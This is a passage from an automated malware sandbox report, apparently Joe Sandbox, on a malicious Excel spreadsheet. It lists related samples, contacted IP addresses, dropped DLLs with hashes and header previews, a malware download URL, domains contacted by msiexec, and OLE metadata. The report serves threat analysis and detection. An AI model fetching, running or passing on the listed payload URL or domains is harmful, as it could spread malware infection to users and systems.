                                                        case (1522).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        case (4374).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        case (166).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        PAYMENT.xlsxGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        case (547).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        The Mental Health Center.xlsxGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        Remittance Advice 117301.xlsxGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        SC-TR1167700000.xlsxGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        PAYMENT INFO.xlsxGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        case (348).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        RefTreeAnalyserXL.xlamGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        case (426).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        case (250).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        case (1447).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        case (850).xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109
                                                        SecuriteInfo.com.Heur.18472.xlsGet hashmaliciousBrowse
                                                        • 172.67.158.184
                                                        • 172.67.150.228
                                                        • 172.67.200.147
                                                        • 172.67.198.109

                                                        Dropped Files

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        C:\Users\user\AppData\Roaming\Ida\suicy.dllcase (2553).xlsGet hashmaliciousBrowse
                                                          case (2553).xlsGet hashmaliciousBrowse
                                                            case (1057).xlsGet hashmaliciousBrowse
                                                              case (4374).xlsGet hashmaliciousBrowse
                                                                case (4335).xlsGet hashmaliciousBrowse
                                                                  case (1522).xlsGet hashmaliciousBrowse
                                                                    case (4374).xlsGet hashmaliciousBrowse
                                                                      case (166).xlsGet hashmaliciousBrowse
                                                                        C:\ProgramData\formnet.dllcase (2553).xlsGet hashmaliciousBrowse
                                                                          case (2553).xlsGet hashmaliciousBrowse
                                                                            case (1057).xlsGet hashmaliciousBrowse
                                                                              case (4374).xlsGet hashmaliciousBrowse
                                                                                case (4335).xlsGet hashmaliciousBrowse
                                                                                  case (1522).xlsGet hashmaliciousBrowse
                                                                                    case (4374).xlsGet hashmaliciousBrowse
                                                                                      case (166).xlsGet hashmaliciousBrowse
                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllcase (2553).xlsGet hashmaliciousBrowse
                                                                                          case (2553).xlsGet hashmaliciousBrowse
                                                                                            case (1057).xlsGet hashmaliciousBrowse
                                                                                              case (4374).xlsGet hashmaliciousBrowse
                                                                                                case (4335).xlsGet hashmaliciousBrowse
                                                                                                  case (1522).xlsGet hashmaliciousBrowse
                                                                                                    case (4374).xlsGet hashmaliciousBrowse
                                                                                                      case (166).xlsGet hashmaliciousBrowse

                                                                                                        Created / dropped Files

                                                                                                        C:\ProgramData\formnet.dll
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):933888
                                                                                                        Entropy (8bit):6.687983171155114
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                                                                                        MD5:B0F3FA047F6AE39A145FD364F693638E
                                                                                                        SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                                                                                        SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                                                                                        SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                                                                                        Malicious:true
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: case (2553).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (2553).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (1057).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (4374).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (4335).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (1522).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (4374).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (166).xls, Detection: malicious, Browse
                                                                                                        Reputation:low
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):933888
                                                                                                        Entropy (8bit):6.687983171155114
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                                                                                        MD5:B0F3FA047F6AE39A145FD364F693638E
                                                                                                        SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                                                                                        SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                                                                                        SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                                                                                        Malicious:true
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: case (2553).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (2553).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (1057).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (4374).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (4335).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (1522).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (4374).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (166).xls, Detection: malicious, Browse
                                                                                                        Reputation:low
                                                                                                        IE Cache URL:https://rnollg.com/kev/scfrd.dll
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Temp\FFDE0000
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):59779
                                                                                                        Entropy (8bit):7.76990481728098
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:SwGBP++aB0WviH/WoTXZSzrSimIbCVpoWpgffXfQ9DP:SwmW+aB3viH/WaI5xGVpoWpgE
                                                                                                        MD5:A7D9C3771F2032417EBF7EA7F6A37E0B
                                                                                                        SHA1:0EA30CB7C635AD1CB26C0767432A89B4C22B7A96
                                                                                                        SHA-256:AB84812A4AEF4C0CA9D12B53FC4D27BFA06CE14F4FE3CDD98A90F783A5570F01
                                                                                                        SHA-512:1A902A4B44ECD49F6882823EF7ABB0C89D8AFE260715575532892AC6877D8166A74D77A14EF01799F89B4EB0AB93A9500F0F7EAD8834E1291EECE2FFF67F49F1
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview: ..n.0...'..".N...v.z.u.[.v.`.Cb...........U{n.....I.I...U.d..2zJX1"...H..).s.3?'..BK...S..O.g.?Ln..|.....:...R_..._..:.,.kE.?]E.(....G.3Z..@.<..d6...q..j.oo..&...sIjJ...*E.F.{".Y,T..wml]x.@H_...).SQ..@.qc...VW{..M........W.cs;."Vv[..S.....r|.....:%!.....m..]5.....eq.I.f.sX.....V..\i1o ......Q..J=.Nl..Su.L..P.......@....}..c$>>#.....3$>.".q......l...s...$cX..0.a.*.BU.....W...2,d.X....c!+.BV.....Y9..r,d.X...u....."k.a....r.].....u....*l..)....1F.^....{|H'.....x...N..L....cl.`.....T....\P....%j;..&...KB!.....m...........PK..........!..0O.&...........[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Roaming\Ida\suicy.dll
                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):933888
                                                                                                        Entropy (8bit):6.687983171155114
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                                                                                        MD5:B0F3FA047F6AE39A145FD364F693638E
                                                                                                        SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                                                                                        SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                                                                                        SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                                                                                        Malicious:false
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: case (2553).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (2553).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (1057).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (4374).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (4335).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (1522).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (4374).xls, Detection: malicious, Browse
                                                                                                        • Filename: case (166).xls, Detection: malicious, Browse
                                                                                                        Reputation:low
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 27 11:09:42 2021, atime=Wed Jan 27 11:09:42 2021, length=8192, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):867
                                                                                                        Entropy (8bit):4.481405608311833
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:85QQ/CLgXg/XAlCPCHaXgzB8IB/woOX+WnicvbabDtZ3YilMMEpxRljKJ6TdJP9O:85nU/XTwz6IJOYeiDv3q6irNru/
                                                                                                        MD5:1A44E1DFFB97FA24D8BC41E9E0017B62
                                                                                                        SHA1:15E8A00C0E558BE10FF2C205566D065965BA385B
                                                                                                        SHA-256:1A5E59005FC31F97D449F049015FF1F187C63EAEB40D37C1D345A0AF8B6FD42B
                                                                                                        SHA-512:8F6CD075914EC07EFDAAFD5454C259CDC1BD3F8990227275C6E57CFF856504B05893D5A10414B6E6EA439A05AD7DE528D8261568808F1EA7FA4837E2BABCD155
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview: L..................F...........7G..W..K....W..K..... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....;R6a..Desktop.d......QK.X;R6a*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\376483\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......376483..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Heur.30497.LNK
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jan 27 11:09:32 2021, mtime=Wed Jan 27 11:09:42 2021, atime=Wed Jan 27 11:09:42 2021, length=99328, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4396
                                                                                                        Entropy (8bit):4.567911708275409
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:86/XLIxOn+tQh26/XLIxOn+tQh2V/XLIxOn+tQh2V/XLIxOn+tQ/:8IIKwQEIIKwQElIKwQElIKwQ/
                                                                                                        MD5:23AB55100C14FFD6047D25463B37E0C5
                                                                                                        SHA1:25F90F80B15416D16AFD468F40BE211743B6904B
                                                                                                        SHA-256:1245BA7C17CFF70407811B455439ACA6D9797BE44BF50F159D6C37F0FF252FE2
                                                                                                        SHA-512:799ACE3E52EC0086D4C2B14ADD88650573B6FBDA56118FFD830E5D2A3805FBEFD6C5B8931BB6AAA5AE115ACA6B235292A5FC75C763C9B4928C0729ABA8148F08
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview: L..................F.... ....vsE....W..K....w..K.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....;R1a..Desktop.d......QK.X;R1a*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.&d..;R2a .SECURI~1.XLS..l......;R1a;R1a*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...3.0.4.9.7...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\376483\Users.user\Desktop\SecuriteInfo.com.Heur.30497.xls.6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...3.0.4.9.7...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`
                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:modified
                                                                                                        Size (bytes):288
                                                                                                        Entropy (8bit):4.760481812020176
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:oyBVomM0bWd6luscbWd6lmM0bWd6luscbWd6lmM0bWd6luscbWd6lmM0bWd6lv:dj608n8o08n8o08n8o08I
                                                                                                        MD5:9AD192B0D52EAE71507C1735C57419A1
                                                                                                        SHA1:E173FFAC7D0CFF384D3450B59DEC3674CE23BA28
                                                                                                        SHA-256:E17EBF86E399E97A92D604BC6AA68E6A2CA6E01B7A62EBA256F96FEA9B7757D1
                                                                                                        SHA-512:F92FC8CB5C34255BA5D5B46A88EB1179E2E15CFD83E6DE2E78F459AF307855484CE278067DE697A08DF6CF8ED73B0A4A11207C9817C16F572CA3E1BA368A681B
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Heur.30497.LNK=0..SecuriteInfo.com.Heur.30497.LNK=0..[xls]..SecuriteInfo.com.Heur.30497.LNK=0..SecuriteInfo.com.Heur.30497.LNK=0..[xls]..SecuriteInfo.com.Heur.30497.LNK=0..SecuriteInfo.com.Heur.30497.LNK=0..[xls]..SecuriteInfo.com.Heur.30497.LNK=0..
                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\03IOIHRV.txt
                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):114
                                                                                                        Entropy (8bit):4.413749198597451
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:GmM/Gp4HyUEKUTv4Mdl1cSncmbWg6gQln:XM/XyUEKUj4qlVcmb96Xn
                                                                                                        MD5:280A16E1B8DB58223E13F4709898028A
                                                                                                        SHA1:CFA2C1517C522E858AE088ABF9E00B7D524667A2
                                                                                                        SHA-256:0B0840333DBBECCD5FC9275961D2402EAB1CF74018D5D1C4DCFAA3498DA1E7DD
                                                                                                        SHA-512:0F66F6BC58D7CF1E8EADA8E57CC407AB41C30CD69423179C7290FC0C6383EB363DD0556B5F4EC8DC0AF9DAC2C27EDFE0B0CDD7C9C6C41A24F95343D0652DA1E6
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        IE Cache URL:govemedico.tk/
                                                                                                        Preview: __cfduid.dc4013be8f84b92a24dd61ed36d78733f1611717042.govemedico.tk/.9728.4149093632.30870508.313104246.30864550.*.
                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0RM1C1X2.txt
                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):118
                                                                                                        Entropy (8bit):4.4950508645985945
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:GmM/AGASo1E0HcSjUSTvaWqKJpKfcSNFcmacCXWYiQln:XM/AG3o1DHDjdqv0nm+Vn
                                                                                                        MD5:6E8ACE4E3302E2CE0B5C090CB4ED4112
                                                                                                        SHA1:846E75D52B6FB67ADB80F273619099297842CD78
                                                                                                        SHA-256:955F4B80E7DFBF8CDE2AE8222CC4882287CAA1FF3C5AFC03B3E3EBC68E8E2C5E
                                                                                                        SHA-512:211EF2ECE8468660765A4B10451DDEA1B4979F2D7967760CE66EAA71C44F1F39EA1DD93721FF36D23DD31BB93CC7F78B102172031B6F0244E9AB9C88002C8803
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        IE Cache URL:homesoapmolds.com/
                                                                                                        Preview: __cfduid.dbe375a4c3b7a9d214ba1b08c7b2265721611717042.homesoapmolds.com/.9728.4149093632.30870508.306552234.30864550.*.
                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\HPDR9FYI.txt
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                        File Type:ASCII text
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):112
                                                                                                        Entropy (8bit):4.476251353015926
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:GmM/mgEG7SwfvwdUmoGT0cSN1m2OgQRcvXn:XM/X7XmUmoSYmp7c/
                                                                                                        MD5:555DAC8B81F26FB082BBDA1653CC5566
                                                                                                        SHA1:DF955551DE8639C59E5C5894A7C5228E36E7E70B
                                                                                                        SHA-256:A6FB6F91512552CA807B933C60E58544CD021551408A933318329F0BC387D8C9
                                                                                                        SHA-512:06A79DD9F38EE659C3EDEED65F3126A100A72ECD8FA47201DFD9EE32C0AC3D2851F98C52BB486C2A516B16ECD1742DCAAC74DA50747508BD8E1D3736AB608820
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        IE Cache URL:rnollg.com/
                                                                                                        Preview: __cfduid.defbeab7f64597ca8f3d0e17546ea04381611717009.rnollg.com/.9728.3819093632.30870508.1276266950.30864549.*.
                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\SZU335ZX.txt
                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):116
                                                                                                        Entropy (8bit):4.465566043137573
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:GmM/wIVfIQ5dsoLUSQvCfKw2lSNeVnJa+FvgQQln:XM/wIn5dsIQcKweLmn
                                                                                                        MD5:C3506F4CD1069F521F0525695B81DE97
                                                                                                        SHA1:D8934DD7C1DE658F4EC4FA283419691C8AAC1E4D
                                                                                                        SHA-256:076377819952C20515418852C8FA01388ACBBBADF371DA22255BC2AE766AC852
                                                                                                        SHA-512:C2820EADC52A6269CCF34B14068F38F1B6739F58DAC9738352C5976A17DCA1B9BCEE86693E79B21FC423C536923C5B89D8D2B8DB8D0D4A1CDB357D13BDA67725
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        IE Cache URL:gadgetswolf.com/
                                                                                                        Preview: __cfduid.db876a0ff145337e89c4a64e084a47aa01611717041.gadgetswolf.com/.9728.4139093632.30870508.300156223.30864550.*.
                                                                                                        C:\Users\user\Desktop\D0EE0000
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                                                        Category:dropped
                                                                                                        Size (bytes):173366
                                                                                                        Entropy (8bit):5.331160426572254
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:9xrtdAOtyoVlDGUUlEfblBiPP58LmlPi+aEvthlhaEv9hE6DxrtdAOtyoVlDGUU8:9xrtdAOtyoVlDGUUlEfblBeP52mlPi+t
                                                                                                        MD5:102877D8CAA21F584D113C42EC0399C1
                                                                                                        SHA1:40D8DA62B958550147FFCD15AB5BE7F2731C179D
                                                                                                        SHA-256:A36D04B51C59895B68EC58AFB95074BFF35E95E83B42E4FD5783566D11499D74
                                                                                                        SHA-512:45199AFC9CB001D265A08327DEE4385B27E78320FB829C5F805FF0E87156ACC8E58EAE2F872F5C3FEBFF8A1981E4B3FA721E318F35BE6B4F34BE08F8FA7C991E
                                                                                                        Malicious:false
                                                                                                        Preview: ........g2..........................\.p....user B.....a.........=.@............................................................... .....................................=........K.$8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.o.r.b.e.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.(.@...............C.o.r.b.e.l. .L.i.g.h.t.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...@...,...........C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1.(.0...............C.o.r.b.e.l. .L.i.g.h.t.1.(.0...>...........C.o.r.b.e.l. .L.i.g.h.t.1.(.....>...........C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...0...............C.a.

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: , Last Saved By: , Name of Creating Application: Microsoft Excel, Last Printed: Tue Jan 26 16:17:13 2021, Create Time/Date: Thu Apr 23 13:26:24 2020, Last Saved Time/Date: Tue Jan 26 16:28:15 2021, Security: 0
                                                                                                        Entropy (8bit):3.873783584079212
                                                                                                        TrID:
                                                                                                        • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                        File name:SecuriteInfo.com.Heur.30497.xls
                                                                                                        File size:156710
                                                                                                        MD5:26f124898bf4a54f4c110bb58b3f38c4
                                                                                                        SHA1:a3eaad9a0cb49e8e12678c9e82d93e53d7d38008
                                                                                                        SHA256:989e829731d55da1c9f0afdcebd1de9df19bfa1ff8935cee7b0eb8f1b5378fc5
                                                                                                        SHA512:dbaf2a730c0bb58e343610b610b9385d0061dc66b0eb8960722c06291ff942a7a3dd0e19f714a04a9b3771c46ae10b42acc15051bb9a5fd397660dcafc177026
                                                                                                        SSDEEP:3072:49SUz4tH8vsderSh1yRNJd6zAtH8U5BXKjBPWlyTSgG+g17:49SUz4tH8vsderSh1yRNJdaAtH8U5B6u
                                                                                                        File Content Preview:........................>.......................0...........................-......./..........................................................................................................................................................................

                                                                                                        File Icon

                                                                                                        Icon Hash:e4eea286a4b4bcb4

                                                                                                        Static OLE Info

                                                                                                        General

                                                                                                        Document Type:OLE
                                                                                                        Number of OLE Files:1

                                                                                                        OLE File "SecuriteInfo.com.Heur.30497.xls"

                                                                                                        Indicators

                                                                                                        Has Summary Info:True
                                                                                                        Application Name:Microsoft Excel
                                                                                                        Encrypted Document:False
                                                                                                        Contains Word Document Stream:False
                                                                                                        Contains Workbook/Book Stream:True
                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                        Contains Visio Document Stream:False
                                                                                                        Contains ObjectPool Stream:
                                                                                                        Flash Objects Count:
                                                                                                        Contains VBA Macros:False

                                                                                                        Summary

                                                                                                        Code Page:1251
                                                                                                        Author:
                                                                                                        Last Saved By:
                                                                                                        Last Printed:2021-01-26 16:17:13
                                                                                                        Create Time:2020-04-23 12:26:24
                                                                                                        Last Saved Time:2021-01-26 16:28:15
                                                                                                        Creating Application:Microsoft Excel
                                                                                                        Security:0

                                                                                                        Document Summary

                                                                                                        Document Code Page:1251
                                                                                                        Thumbnail Scaling Desired:False
                                                                                                        Company:
                                                                                                        Contains Dirty Links:False

                                                                                                        Streams

                                                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                        General
                                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                                        File Type:data
                                                                                                        Stream Size:4096
                                                                                                        Entropy:0.843601759481
                                                                                                        Base64 Encoded:False
                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . ( . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j S R F q S o B P w O . . . . . M a c r o 2 . . . . . M a c r o 3 . . . . . M a c r o 4 . . . . . M a c r o 5 . . . . . M a c r o 6 . . . . . M a c r o 7 . . . . . M a c r o 8 . . . . . M a c r o 9 . . . . .
                                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 28 02 00 00 06 00 00 00 01 00 00 00 38 00 00 00 0f 00 00 00 40 00 00 00 0b 00 00 00 4c 00 00 00 10 00 00 00 54 00 00 00 0d 00 00 00 5c 00 00 00 0c 00 00 00 e7 01 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 0b 00 00 00
                                                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                        General
                                                                                                        Stream Path:\x5SummaryInformation
                                                                                                        File Type:data
                                                                                                        Stream Size:4096
                                                                                                        Entropy:0.362148031008
